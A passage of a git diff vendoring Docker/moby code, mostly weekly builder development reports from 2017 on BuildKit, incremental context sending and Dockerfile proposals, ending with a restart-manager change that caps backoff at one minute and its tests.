doesn't make decisions for a specific worker, snapshot or exporter implementations. + +It is designed to help find the most efficient way to process build tasks and intelligently cache them for repeated invocations. + +### Quality: Dependency interface switch + +To improve quality and performance, a new [proposal was made for switching the dependency interface](https://github.com/moby/moby/issues/32904) for current builder package. That should fix the current problems with data leakage and conflicts caused by daemon state cleanup scripts. + +@dnephin is in progress of refactoring current builder code to logical areas as a preparation work for updating this interface. + +Merged as part of this effort: + +- [Refactor Dockerfile.parser and directive](https://github.com/moby/moby/pull/32580) +- [Refactor builder dispatch state](https://github.com/moby/moby/pull/32600) +- [Use a bytes.Buffer for shell_words string concat](https://github.com/moby/moby/pull/32601) +- [Refactor `Builder.commit()`](https://github.com/moby/moby/pull/32772) +- [Remove b.escapeToken, create ShellLex](https://github.com/moby/moby/pull/32858) + +### New feature: Long running session + +PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enabled advanced features like incremental context send, build credentials from the client, ssh forwarding etc. is looking for initial design review. It is currently open if features implemented on top of it would use a specific transport implementation on the wire or a generic interface(current implementation). @tonistiigi is working on adding persistent cache capabilities that are currently missing from that PR. It also needs to be figured out how the [cli split](https://github.com/moby/moby/pull/32694) will affect features like this. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +These proposals have gotten mostly positive feedback for now. We will leave them open for a couple of more weeks and then decide what actions to take in a maintainers meeting. Also, if you are interested in implementing any of them, leave a comment on the specific issues. + +### Other new builder features currently in code-review: + +[`docker build --iidfile` to capture the ID of the build result](https://github.com/moby/moby/pull/32406) + +[Allow builds from any git remote ref](https://github.com/moby/moby/pull/32502) + +### Backlog: + +[Build secrets](https://github.com/moby/moby/pull/30637) will be brought up again in next maintainer's meeting to evaluate how to move on with this, if any other proposals have changed the objective and if we should wait for swarm secrets to be available first. diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-08.md b/vendor/github.com/docker/docker/reports/builder/2017-05-08.md new file mode 100644 index 0000000000..d9396ab764 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-05-08.md @@ -0,0 +1,57 @@ +# Development Report for May 08, 2017 + + +### Quality: Dependency interface switch + +Proposal for [switching the dependency interface](https://github.com/moby/moby/issues/32904) for current builder package. That should fix the current problems with data leakage and conflicts caused by daemon state cleanup scripts. + +Merged as part of this effort: + +- [Move dispatch state to a new struct](https://github.com/moby/moby/pull/32952) +- [Cleanup unnecessary mutate then revert of b.runConfig](https://github.com/moby/moby/pull/32773) + +In review: +- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061) +- [Expose GetImage interface for builder](https://github.com/moby/moby/pull/33054) + +### Merged: docker build --iidfile + +[`docker build --iidfile` to capture the ID of the build result](https://github.com/moby/moby/pull/32406). New option can be used by the CLI applications to get back the image ID of build result. API users can use the `Aux` messages in progress stream to also get the IDs for intermediate build stages, for example to share them for build cache. + +### New feature: Long running session + +PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding etc. + +@simonferquel proposed a [grpc-only version of that interface](https://github.com/moby/moby/pull/33047) that should simplify the setup needed for describing new features for the session. Looking for design reviews. + +The feature also needs to be reworked after CLI split. + +### buildkit + +Not much progress [apart from some design discussion](https://github.com/moby/moby/issues/32925). Next step would be to open up a repo. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other new builder features currently in code-review: + +[Allow builds from any git remote ref](https://github.com/moby/moby/pull/32502) + +[Fix a case where using FROM scratch as NAME would fail](https://github.com/moby/moby/pull/32997) + +### Backlog: + +[Build secrets](https://github.com/moby/moby/pull/30637) will be brought up again in next maintainer's meeting to evaluate how to move on with this, if any other proposals have changed the objective and if we should wait for swarm secrets to be available first. diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-15.md b/vendor/github.com/docker/docker/reports/builder/2017-05-15.md new file mode 100644 index 0000000000..cfc742f3aa --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-05-15.md @@ -0,0 +1,64 @@ +# Development Report for May 15, 2017 + +### Multi-stage builds fixes coming in 17.06-rc1 + +Some bugs were discovered in new multi-stage build feature, release in 17.05. + +When using an image name directly in `COPY --from` without defining a build stage, the data associated with that image was not properly cleaned up. + +If a second was based on `scratch` image, the metadata from the previous stage didn't get reset, forcing the user to clear it manually with extra commands. + +Fixes for these are merged for the next release, everyone is welcomed to test it once `17.06-rc1` is out. + +- [Fix resetting image metadata between stages for scratch case](https://github.com/moby/moby/pull/33179) +- [Fix releasing implicit mounts](https://github.com/moby/moby/pull/33090) +- [Fix a case where using FROM scratch as NAME would fail](https://github.com/moby/moby/pull/32997) + + +### Quality: Dependency interface switch + +Work continues on making the builder dependency interface more stable. This week methods for getting access to source image were swapped out to a new version that keeps a reference to image data until build job has complete. + +Merged as part of this effort: + +- [Expose GetImage interface for builder](https://github.com/moby/moby/pull/33054) + +In review: +- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061) +- [Refactor COPY/ADD dispatchers](https://github.com/moby/moby/pull/33116) + + +### New feature: Long running session + +PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding etc. + +@simonferquel updated a [grpc-only version of that interface](https://github.com/moby/moby/pull/33047) and mostly seems that consensus was achieved for using only grpc transport. @tonistiigi finished up persistent cache layer and garbage collection for file transfers. The PR now needs to be split up because CLI has moved. Once that is done, the main PR should be ready for review early this week. + +### Merged: Specifying any remote ref in git checkout URLs + +Building from git sources now allows [specifying any remote ref](https://github.com/moby/moby/pull/32502). For example, to build a pull request from GitHub you can use: `docker build git://github.com/moby/moby#pull/32502/head`. + + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other new builder features currently in code-review: + +- + +### Backlog: + +[Build secrets](https://github.com/moby/moby/pull/30637) will be brought up again in next maintainer's meeting to evaluate how to move on with this, if any other proposals have changed the objective and if we should wait for swarm secrets to be available first. diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-22.md b/vendor/github.com/docker/docker/reports/builder/2017-05-22.md new file mode 100644 index 0000000000..29ecc6bb9a --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-05-22.md @@ -0,0 +1,47 @@ +# Development Report for May 22, 2017 + +### New feature: Long running session + +PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding etc. is ready for reviews. This is blocking many new features like token signing, not pulling unnecessary context files, exposing sources outside working directory etc. + + +### Quality: Dependency interface switch + +Work continues on making the builder dependency interface more stable. + +Merged as part of this effort this week: + +- [Refactor COPY/ADD dispatchers](https://github.com/moby/moby/pull/33116) + +In review: +- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061) + +### Buildkit + +[Diff and snapshot services](https://github.com/containerd/containerd/pull/849) were added to containerd. This is a required dependency for [buildkit](https://github.com/moby/moby/issues/32925). + +### Proposals discussed in maintainers meeting + +New builder proposals were discussed in maintainers meeting. The decision was to give 2 more weeks for anyone to post feedback to [IMPORT/EXPORT commands](https://github.com/moby/moby/issues/32100) and [`RUN --mount`](https://github.com/moby/moby/issues/32507) and accept them for development if nothing significant comes up. + +Build secrets and its possible overlap with [--mount](https://github.com/moby/moby/issues/32507) was discussed as well. The decision was to create a [new issue](https://github.com/moby/moby/issues/33343)(as the [old PR](https://github.com/moby/moby/pull/30637) is closed) to track this and avoid it from blocking `--mount` implementation. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other new builder features currently in code-review: + +- diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-29.md b/vendor/github.com/docker/docker/reports/builder/2017-05-29.md new file mode 100644 index 0000000000..33043d9f3b --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-05-29.md @@ -0,0 +1,52 @@ +# Development Report for May 29, 2017 + +### New feature: Long running session + +PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding, etc. is ready for reviews. It is blocking many new features like the token signing, not pulling unnecessary context files, exposing sources outside working directory, etc. Maintainers are encouraged to give this one a review! + + +### Quality: Dependency interface switch + +Work continues on making the builder dependency interface more stable. + +Merged as part of this effort this week: + +- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061) + +@dnephin continues working on the copy/export aspects of the interface. + +### Buildkit + +Some initial proof of concept code for [buildkit](https://github.com/moby/moby/issues/32925) has been pushed to https://github.com/tonistiigi/buildkit_poc . It's in a very early exploratory stage. Current development has been about providing concurrent references based access to the snapshot data that is backed by containerd. More info should follow in next weeks, including hopefully opening up an official repo. If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby. + +### Proposals discussed in maintainers meeting + +Reminder from last week: New builder proposals were discussed in maintainers meeting. The decision was to give 2 more weeks for anyone to post feedback to [IMPORT/EXPORT commands](https://github.com/moby/moby/issues/32100) and [`RUN --mount`](https://github.com/moby/moby/issues/32507) and accept them for development if nothing significant comes up. + +New issue about [build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality please make yourself heard. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other new builder features currently in code-review: + +[Fix canceling builder on chunked requests](https://github.com/moby/moby/pull/33363) + +[Fix parser directive refactoring](https://github.com/moby/moby/pull/33436) + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) \ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-06-05.md b/vendor/github.com/docker/docker/reports/builder/2017-06-05.md new file mode 100644 index 0000000000..3746c2639e --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-06-05.md @@ -0,0 +1,58 @@ +# Development Report for June 5, 2017 + +### New feature: Long running session + +Similarly to last week, the PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) is waiting for reviews. It is blocking many new features like the token signing, not pulling unnecessary context files, exposing sources outside working directory, etc. Maintainers are encouraged to give this one a review so it can be included in `v17.07` release. + + +### Quality: Dependency interface switch + +Work continues on making the builder dependency interface more stable. + +PRs currently in review as part of this effort: + +- [Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) + +This PR is the core of the update that removes the need to track active containers and instead of lets builder hold references to layers while it's running. + +Related to this, @simonferquel opened a [WIP PR](https://github.com/moby/moby/pull/33492) that introduces typed Dockerfile parsing. This enables making [decisions about dependencies](https://github.com/moby/moby/issues/32550#issuecomment-297867334) between build stages and reusing Dockerfile parsing as a buildkit frontend. + +### Buildkit + +Some initial proof of concept code for [buildkit](https://github.com/moby/moby/issues/32925) has been pushed to https://github.com/tonistiigi/buildkit_poc . It's in a very early exploratory stage. Current codebase includes libraries for getting concurrency safe references to containerd snapshots using a centralized cache management instance. There is a sample source implementation for pulling images to these snapshots and executing jobs with runc on top of them. There is also some utility code for concurrent execution and progress stream handling. More info should follow in next weeks, including hopefully opening up an official repo. If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby. + +### Proposals discussed in maintainers meeting + +Reminder from last week: New builder proposals were discussed in maintainers meeting. The decision was to give two more weeks for anyone to post feedback to [IMPORT/EXPORT commands](https://github.com/moby/moby/issues/32100) and [`RUN --mount`](https://github.com/moby/moby/issues/32507) and accept them for development if nothing significant comes up. It is the last week to post your feedback on these proposals or the comments in them. You can also volunteer to implement them. + +A new issue about [build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other builder PRs merged last week + +[Fix canceling builder on chunked requests](https://github.com/moby/moby/pull/33363) + +[Fix parser directive refactoring](https://github.com/moby/moby/pull/33436) + +### Builder features currently in code-review: + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) \ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-06-12.md b/vendor/github.com/docker/docker/reports/builder/2017-06-12.md new file mode 100644 index 0000000000..df5d801e76 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-06-12.md @@ -0,0 +1,58 @@ +# Development Report for June 12, 2017 + + +### Buildkit + +[Proposal](https://github.com/moby/moby/issues/32925) + +More updates to the [POC repo](https://github.com/tonistiigi/buildkit_poc). It now contains binaries for the daemon and client. Examples directory shows a way for invoking a build job by generating the internal low-level build graph definition with a helper binary(as there is not support for frontends yet). The grpc control server binary can be built in two versions, one that connects to containerD socket and other that doesn't have any external dependencies. + +If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby. + +### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +New PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers. + +### Long running session & incremental file sending + +[PR ](https://github.com/moby/moby/pull/32677) + +Same status as last week. The PR went through one pass of review from @dnephin and has been rebased again. Maintainers are encouraged to give this one a review so it can be included in `v17.07` release. + + +### Quality: Dependency interface switch + +[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR is waiting for a second review. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other builder PRs merged last week + + +### Builder features currently in code-review: + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) + +### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. \ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-06-26.md b/vendor/github.com/docker/docker/reports/builder/2017-06-26.md new file mode 100644 index 0000000000..e0ba95a7a5 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-06-26.md @@ -0,0 +1,78 @@ +# Development Report for June 26, 2017 + + +### BuildKit + +[Repo](https://github.com/moby/buildkit) +[Proposal](https://github.com/moby/moby/issues/32925) + +New development repo is open at https://github.com/moby/buildkit + +The readme file provides examples how to get started. You can see an example of building BuildKit with BuildKit. + +There are lots of new issues opened as well to track the missing functionality. You are welcomed to help on any of them or discuss the design there. + +Last week most of the work was done on improving the `llb` client library for more complicated use cases and providing traces and interactive progress of executed build jobs. + +The `llb` client package is a go library that helps you to generate the build definition graph. It uses chained methods to make it easy to describe what steps need to be running. Mounts can be added to the execution steps for defining multiple inputs or outputs. To prepare the graph, you just have to call `Marshal()` on a leaf node that will generate the protobuf definition for everything required to build that node. + +### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +This PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers(eg. BuildKit). + +The PR had some review and updates in last week. Should be ready to code review soon. + +### Merged: Long running session & incremental file sending + +[PR](https://github.com/moby/moby/pull/32677) + +Incremental context sending PR was merged and is expected to land in `v17.07`. + +This feature experimental feature lets you skip sending the build context to the daemon on repeated builder invocations during development. Currently, this feature requires a CLI flag `--stream=true`. If this flag is used, one first builder invocation full build context is sent to the daemon. On a second attempt, only the changed files are transferred. + +Previous build context is saved in the build cache, and you can see how much space it takes form `docker system df`. Build cache will be automatically garbage collected and can also be manually cleared with `docker prune`. + +### Quality: Dependency interface switch + +[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR was merged. + + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other builder PRs merged last week + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) + +[fix copy —from conflict with force pull](https://github.com/moby/moby/pull/33735) + +### Builder features currently in code-review: + +[Fix handling of remote "git@" notation](https://github.com/moby/moby/pull/33696) + +[builder: Emit a BuildResult after squashing.](https://github.com/moby/moby/pull/33824) + +[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704) + +### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. \ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-07-10.md b/vendor/github.com/docker/docker/reports/builder/2017-07-10.md new file mode 100644 index 0000000000..76aeee0f1d --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-07-10.md @@ -0,0 +1,65 @@ +# Development Report for July 10, 2017 + + +### BuildKit + +[Repo](https://github.com/moby/buildkit) +[Proposal](https://github.com/moby/moby/issues/32925) + +Many new features have been added since the last report. + +The build definition solver was updated to detect the identical parts of the graph sent by different clients and synchronize their processing. This is important when multiple targets of the same project are built at the same time and removes any duplication of work. + +Running build jobs now has support for graceful canceling and clear error reporting in case some build steps fail or are canceled. Bugs that may have left state dir in an inconsistent state of server shutdown were fixed. + +`buildctl du` command now shows all the information about allocated and in-use snapshots. It also shows the total space used and total reclaimable space. All snapshots are now persistent, and state is not lost with server restarts. + +New metadata package was implemented that other packages can use to add persistent and searchable metadata to individual snapshots. First users of that feature are the content blobs mapping on pull, size cache for `du` and instruction cache. There is also a new debug command `buildctl debug dump-metadata` to inspect what data is being stored. + +The first version of instruction cache was implemented. This caching scheme has many benefits compared to the current `docker build` caching as it doesn't require all data to be locally available to determine the cache match. The interface for the cache implementation is much simpler and could be implemented remotely as it only needs to store the cache keys and doesn't need to understand or compare their values. Content-based caching will be implemented on top of this work later. + +Separate source implementation for git repositories is currently in review. Using this source for accessing source code in git repositories has many performance and caching advantages. All the build jobs using the same git remote will use a shared local repository where updates will be pulled. All the nodes based on a git source will be cached using the commit ID of the current checkout. + +Next areas to be worked on will be implementing first exporters for getting access to the build artifacts and porting over the client session/incremental-send feature from `17.07-ce`. + +### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +The PR is in code review and waiting for feedback. Hopefully ready to be merged this week. + +### Quality: Dependency interface switch + +No updates for this week. Metadata commands need to be updated but it is probably easier to do it after https://github.com/moby/moby/pull/33492 has been merged. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +New: [RFC: Distributed BuildKit](https://github.com/moby/buildkit/issues/62) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other builder PRs merged last week + +[build: fix add from remote url](https://github.com/moby/moby/pull/33851) + +### Builder features currently in code-review: + +[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704) + +### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. \ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-07-17.md b/vendor/github.com/docker/docker/reports/builder/2017-07-17.md new file mode 100644 index 0000000000..96cc8d1849 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-07-17.md @@ -0,0 +1,79 @@ +# Development Report for July 17, 2017 + + +### BuildKit + +[Repo](https://github.com/moby/buildkit) +[Proposal](https://github.com/moby/moby/issues/32925) + +Following features were added last week: + +#### Git source + +Source code from git repositories can now be accessed directly, similarly for images can be accessed, without the need to execute `git clone`. This has many performance and caching advantages. It accesses the remote repository using shallow fetches to only pull the required data and a uses a shared bare repository for intermediate cache between build invocations. The instruction cache for the git source is based on a commit hash and not string arguments. This means that you can always be sure that you are building the correct source and that you never build the same source twice. + +#### Containerd exporter + +Exporters are used for getting build artifacts out of buildkit. The first exporter that was implemented allows exposing the image to containerd so it can be run and pushed with `ctr` tool. `buildctl` has `--exporter` flag for specifying the exporter and `--exporter-opt` for custom values passed to the exporter. In the case of image exporter an image name can be specified. + +For example: + +``` +go run ./examples/buildkit2/buildkit.go | buildctl build --exporter image --exporter-opt name=docker.io/moby/buildkit:dev +``` + +Accessing from ctr/dist: + +``` +ctr --namespace buildkit images ls +ctr --namespace buildkit rootfs unpack +ctr --namespace buildkit run -t docker.io/moby/buildkit:dev id ash +``` + +#### Local source + +Buildkit now supports building from local sources. Snapshot of the local source files is created similarly to `docker build` build context. The implementation is based on the [incremental context send](https://github.com/moby/moby/pull/32677) feature in `docker-v17.07`. To use in `buildctl` the source definition needs to define a name for local endpoint, and `buildctl build` command provides a mapping from this name to a local directory with a `--local` flag. + +``` +go run ./examples/buildkit3/buildkit.go --local | buildctl build --local buildkit-src=. +``` + +### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +Didn't manage to merge this PR yet. Still in code-review. + + +### Feedback for `RUN --mount` / `COPY --chown` + +There was some new discussion around [`RUN --mount`](https://github.com/moby/moby/issues/32507) or [`COPY --chown`](https://github.com/moby/moby/issues/30110) feature. Currently, it seems that it may be best to try the shared cache capabilities described in `RUN --mount` in https://github.com/moby/buildkit first(it already supports the generic mounting capabilities). So to unblock the people waiting only on the file owner change features it may make sense to implement `COPY --chown` first. Another related candidate for `v17.08` release is https://github.com/moby/moby/issues/32816. + + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +New: [RFC: Distributed BuildKit](https://github.com/moby/buildkit/issues/62) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Builder features currently in code-review: + +[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704) + +### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. \ No newline at end of file diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager.go b/vendor/github.com/docker/docker/restartmanager/restartmanager.go index 570fc93802..6468ccf7e6 100644 --- a/vendor/github.com/docker/docker/restartmanager/restartmanager.go +++ b/vendor/github.com/docker/docker/restartmanager/restartmanager.go @@ -1,4 +1,4 @@ -package restartmanager +package restartmanager // import "github.com/docker/docker/restartmanager" import ( "errors" @@ -12,6 +12,7 @@ import ( const ( backoffMultiplier = 2 defaultTimeout = 100 * time.Millisecond + maxRestartTimeout = 1 * time.Minute ) // ErrRestartCanceled is returned when the restart manager has been @@ -35,7 +36,7 @@ type restartManager struct { canceled bool } -// New returns a new restartmanager based on a policy. +// New returns a new restartManager based on a policy. func New(policy container.RestartPolicy, restartCount int) RestartManager { return &restartManager{policy: policy, restartCount: restartCount, cancel: make(chan struct{})} } @@ -63,18 +64,22 @@ func (rm *restartManager) ShouldRestart(exitCode uint32, hasBeenManuallyStopped } if rm.active { - return false, nil, fmt.Errorf("invalid call on active restartmanager") + return false, nil, fmt.Errorf("invalid call on an active restart manager") } // if the container ran for more than 10s, regardless of status and policy reset the // the timeout back to the default. if executionDuration.Seconds() >= 10 { rm.timeout = 0 } - if rm.timeout == 0 { + switch { + case rm.timeout == 0: rm.timeout = defaultTimeout - } else { + case rm.timeout < maxRestartTimeout: rm.timeout *= backoffMultiplier } + if rm.timeout > maxRestartTimeout { + rm.timeout = maxRestartTimeout + } var restart bool switch { diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go index 20eced54d3..4b6f302479 100644 --- a/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go +++ b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go @@ -1,4 +1,4 @@ -package restartmanager +package restartmanager // import "github.com/docker/docker/restartmanager" import ( "testing" @@ -9,26 +9,28 @@ import ( func TestRestartManagerTimeout(t *testing.T) { rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager) - should, _, err := rm.ShouldRestart(0, false, 1*time.Second) + var duration = time.Duration(1 * time.Second) + should, _, err := rm.ShouldRestart(0, false, duration) if err != nil { t.Fatal(err) } if !should { t.Fatal("container should be restarted") } - if rm.timeout != 100*time.Millisecond { - t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout) + if rm.timeout != defaultTimeout { + t.Fatalf("restart manager should have a timeout of 100 ms but has %s", rm.timeout) } } func TestRestartManagerTimeoutReset(t *testing.T) { rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager) rm.timeout = 5 * time.Second - _, _, err := rm.ShouldRestart(0, false, 10*time.Second) + var duration = time.Duration(10 * time.Second) + _, _, err := rm.ShouldRestart(0, false, duration) if err != nil { t.Fatal(err) } - if rm.timeout != 100*time.Millisecond { - t.Fatalf("restart manager should have a timeout of 100ms but has %s", 